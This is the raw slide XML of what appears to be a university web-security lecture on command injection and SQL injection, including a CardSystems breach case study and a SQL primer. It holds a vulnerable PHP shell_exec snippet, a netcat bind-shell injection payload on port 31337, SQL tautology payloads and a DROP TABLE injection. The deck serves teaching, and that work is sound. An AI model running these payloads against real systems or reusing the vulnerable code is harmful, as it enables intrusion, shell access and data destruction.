          <p:nvSpPr>
            <p:cNvPr id="15" name="Snip Single Corner Rectangle 14"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4343400" y="2743200"/>
              <a:ext cx="4267200" cy="1476375"/>
            </a:xfrm>
            <a:prstGeom prst="snip1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r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>  $t = $_REQUEST[‘</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" err="1"/>
                <a:t>ip</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>']; </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t> $o = </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" err="1"/>
                <a:t>shell_exec</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>(‘ping –C 3’ . $t);</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t> echo $o</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>  …</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:endParaRPr lang="en-US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777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a Shell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netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> –v –e ‘/bin/bash’ –l –p 31337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6300" y="1828800"/>
            <a:ext cx="7391400" cy="15240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fr-FR" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=127.0.0.1+%26+netcat+-v+-e+'/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'+-l+-p+31337&amp;submit=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>submit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85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086600" y="3810000"/>
            <a:ext cx="372595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7715646" y="3429000"/>
            <a:ext cx="209154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162300" y="2576365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81400" y="1806309"/>
            <a:ext cx="1689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user.php?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=5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5998" y="4234146"/>
            <a:ext cx="3543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FROM users where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=5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3361" y="3774173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009" y="2631180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3216275" y="160666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3140075" y="424194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8234557" y="333245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1" name="Oval 30"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3478013" y="267356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16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086600" y="3810000"/>
            <a:ext cx="372595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7715646" y="3429000"/>
            <a:ext cx="209154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162300" y="2576365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68709" y="1806309"/>
            <a:ext cx="3380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user.php?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>-1 or admin=true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42085" y="4427674"/>
            <a:ext cx="523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FROM users where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>-1 or admin=true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1298" y="3774173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adminuser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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009" y="263118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adminuser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>”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2703584" y="160666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1716162" y="443547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8234557" y="333245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1" name="Oval 30"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3478013" y="267356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293187"/>
            <a:ext cx="1676400" cy="1052407"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="mc_brand_113_gif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281" y="1180312"/>
            <a:ext cx="1640639" cy="1029957"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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7B763EB4-AB53-445B-A24A-77B4A4F03C3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CardSystems</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1536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CardSystems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credit card payment processing company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SQL injection attack in June 2005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put out of business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The Attack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263,000 credit card #s stolen from database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credit card #s stored unencrypted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43 million credit card #s exposed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400800"/>
            <a:ext cx="5910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Image: http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>usa.visa.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>/merchants/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>marketing_center</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>logo_usage.html</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>              https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>www.mastercardbrandcenter.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="14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562735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Primer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616538"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4099859" y="1380565"/>
          <a:ext cx="4236130" cy="13817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452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Column 1 </a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" dirty="0"/>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>of Type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2 </a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" dirty="0"/>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>of Type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3 </a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" dirty="0"/>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>of Type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  <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty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8747"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="914400" y="4302760"/>
          <a:ext cx="7772402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admin.jpg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</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0"/>
                        <a:t> 2&gt;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3&gt;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hacker.jpg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617220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‘users’ table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28600" y="1143000"/>
            <a:ext cx="3733800" cy="21336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 table is defined by a tuple (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>t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, t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, ..., </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>t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  <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>of typed named values. Each row is a tuple of values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(v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:t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" baseline="-25000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, v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:t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" baseline="-25000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, ... </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>v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 err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" baseline="-25000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>n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4300" y="3088957"/>
            <a:ext cx="8572500" cy="1189411"/>
            <a:chOff x="114300" y="3088957"/>
            <a:chExt cx="8572500" cy="1189411"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Rounded Rectangular Callout 7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="114300" y="3612889"/>
              <a:ext cx="1181100" cy="398779"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeRoundRectCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val 43531"/>
                <a:gd name="adj2" fmla="val 100092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smallint</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" dirty="0"/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4419600" y="3088957"/>
              <a:ext cx="1600200" cy="375285"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeRoundRectCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val 18705"/>
                <a:gd name="adj2" fmla="val 139199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varchar</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>(15)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="Right Brace 16"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="16200000">
              <a:off x="5257800" y="849368"/>
              <a:ext cx="533400" cy="6324600"/>
            </a:xfrm>
            <a:prstGeom prst="righ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613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76300" y="1828800"/>
            <a:ext cx="7391400" cy="15240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fr-FR" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>We’re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done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with</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Crypto!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35934" y="3581400"/>
            <a:ext cx="5943602" cy="9144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/>
              <a:t>Key concepts like authentication, integrity, man-in-the-middle attacks, etc. will still be important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7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30679" y="5791200"/>
            <a:ext cx="5943602" cy="914400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/>
              <a:t>A schema is a collection of tables</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>with their intended relations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54508"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="941294" y="914400"/>
          <a:ext cx="7772402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9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avatar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admin.jpg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</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0"/>
                        <a:t> 2&gt;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&lt;hash 3&gt;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hacker.jpg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059581" y="2743200"/>
            <a:ext cx="95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users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63369"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2551398" y="3420035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744565" y="5274235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219200" y="2743200"/>
            <a:ext cx="1332198" cy="67683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135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895600"/>
            <a:ext cx="6858000" cy="3810000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>
                <a:latin typeface="Cambria"/>
                <a:cs typeface="Cambria"/>
              </a:rPr>
              <a:t>columns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Cambria"/>
                <a:cs typeface="Cambria"/>
              </a:rPr>
              <a:t> can either be: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List of comma-separated column names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“*” for all columns</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:latin typeface="Cambria"/>
                <a:cs typeface="Cambria"/>
              </a:rPr>
              <a:t>db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Cambria"/>
                <a:cs typeface="Cambria"/>
              </a:rPr>
              <a:t> is a comma-separated list of tables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:latin typeface="Cambria"/>
                <a:cs typeface="Cambria"/>
              </a:rPr>
              <a:t>exp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Cambria"/>
                <a:cs typeface="Cambria"/>
              </a:rPr>
              <a:t> is a Boolean SQL expression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Single quotes for strings (‘’)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Integers are specified in the normal way</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Cambria"/>
                <a:cs typeface="Cambria"/>
              </a:rPr>
              <a:t>Comments are specified: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Single line: ‘--’ (two dashes) character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Multi-line: “/*” and “*/” (like C)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Cambria"/>
                <a:cs typeface="Cambria"/>
              </a:rPr>
              <a:t>Server-specific, e.g., “#” single-line comment for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Cambria"/>
                <a:cs typeface="Cambria"/>
              </a:rPr>
              <a:t>mysql</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Cambria"/>
              <a:cs typeface="Cambria"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Cambria"/>
              <a:cs typeface="Cambria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2057400"/>
            <a:ext cx="8458200" cy="6858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Returns all rows from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> columns where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>exp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> is true</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24214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99818"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4325855" y="3124200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19022" y="4953000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3124200"/>
            <a:ext cx="3886200" cy="10668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/>
              <a:t>select * from comments where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>user_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> = 2; </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Down Arrow 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1905000" y="4267200"/>
            <a:ext cx="381000" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="down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4953000"/>
            <a:ext cx="3733800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2, 2, “I like sugar”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2, 3, “But not milk”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23567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22955"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3904219" y="3403600"/>
          <a:ext cx="4558759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67447" y="2286001"/>
            <a:ext cx="3466353" cy="3043534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200" dirty="0"/>
              <a:t>select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1"/>
              <a:t>users.first_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1"/>
              <a:t>comments.comment</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t> from users, comments where </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1"/>
              <a:t>users.user_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1"/>
              <a:t>comments.user_id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/>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1"/>
              <a:t>users.user_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t> = 2;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492377"/>
            <a:ext cx="3733800" cy="121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 err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Gordon“I</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> like sugar”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Gordon“But</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> not milk”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24763"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3904219" y="2133600"/>
          <a:ext cx="5163581" cy="11125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first_name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last_name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gordonb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ounded Rectangular Callout 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4419600" y="5329535"/>
            <a:ext cx="3124200" cy="838200"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -86687"/>
              <a:gd name="adj2" fmla="val -158290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Join two tables</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3800127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Tautologies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50672"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4325855" y="3124200"/>
          <a:ext cx="4041204" cy="18542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user_id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comment_id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Test</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0"/>
                        <a:t> Comment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like sugar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But not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Gordon</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0"/>
                        <a:t> is silly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19022" y="4953000"/>
            <a:ext cx="165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comments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2514600"/>
            <a:ext cx="3886200" cy="1752600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800" dirty="0"/>
              <a:t>select * from comments where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>user_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> = 2 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" u="sng" dirty="0"/>
              <a:t>OR 1= 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>;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4800" y="4343400"/>
            <a:ext cx="3733800" cy="2438400"/>
            <a:chOff x="304800" y="4343400"/>
            <a:chExt cx="3733800" cy="2438400"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Down Arrow 9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1905000" y="4343400"/>
              <a:ext cx="381000" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="downArrow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4800" y="4876800"/>
              <a:ext cx="3733800" cy="190500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no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</a:rPr>
                <a:t>1, 1, “Test Comment”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2, 2, “I like sugar”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2, 3, “But not milk”</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2800" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>3, 4, “Gordon is silly”</a:t>
              </a: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609600" y="1219200"/>
            <a:ext cx="7924800" cy="6858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1">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pP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SELECT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>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>columns&gt;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from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db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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas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 &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>exp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1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724400" y="5638800"/>
            <a:ext cx="3276600" cy="85407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Tautologies often used in real attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="218136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25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$id";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28600" y="3148106"/>
            <a:ext cx="4648200" cy="762000"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 13561"/>
              <a:gd name="adj2" fmla="val -159313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Guess as to the exploit?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2778299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26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$id";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5167406" y="3910106"/>
            <a:ext cx="3238500" cy="762000"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 15490"/>
              <a:gd name="adj2" fmla="val -255391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Solution: 1 or 1=1;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8" descr="Screen Shot 2012-07-02 at 2.33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" y="2286000"/>
            <a:ext cx="41021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637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27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228600" y="3148106"/>
            <a:ext cx="4648200" cy="762000"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 13561"/>
              <a:gd name="adj2" fmla="val -159313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Does quoting make it safe?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881094" y="4572000"/>
            <a:ext cx="6805706" cy="1524001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Hint: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:cs typeface="Cambria"/>
              </a:rPr>
              <a:t>Comments are specified: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Single line: ‘--’ (two dashes) character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Multi-line: “/*” and “*/” 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cs typeface="Cambria"/>
              </a:rPr>
              <a:t>“#” single-line comment for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:cs typeface="Cambria"/>
              </a:rPr>
              <a:t>mysql</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"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0092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28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2106" y="152400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4572000" y="3657600"/>
            <a:ext cx="3833906" cy="762000"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 15490"/>
              <a:gd name="adj2" fmla="val -255391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1’ OR 1=1;#</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7" descr="Screen Shot 2012-07-02 at 2.35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34417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92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worse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29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Snip Single Corner Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="869577" y="2226235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1981200" y="4800600"/>
            <a:ext cx="5410200" cy="990600"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -23413"/>
              <a:gd name="adj2" fmla="val -86289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n-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
                <a:cs typeface="Cambria"/>
              </a:rPr>
              <a:t>1</a:t>
            </a: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′  ;  DROP TABLE  Users ; -- #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212" y="6308209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Command not verified, but you get the idea</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 2" descr="http://www.jellyneo.net/images/museum/pets/oldpets_jetsam_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5720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37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Application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37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656391" y="2332240"/>
            <a:ext cx="38312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459195" y="38100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924800" y="3810000"/>
            <a:ext cx="0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40" name="Picture 4" descr="http://i.i.cbsi.com/cnwk.1d/i/tim/2011/03/16/Chrome-logo-2011-03-1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875" l="260" r="98182">
                        <a14:foregroundMark x1="51948" y1="48177" x2="51948" y2="48177"/>
                        <a14:foregroundMark x1="43117" y1="41667" x2="64935" y2="52344"/>
                        <a14:foregroundMark x1="38961" y1="54688" x2="58442" y2="606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383" y="2833563"/>
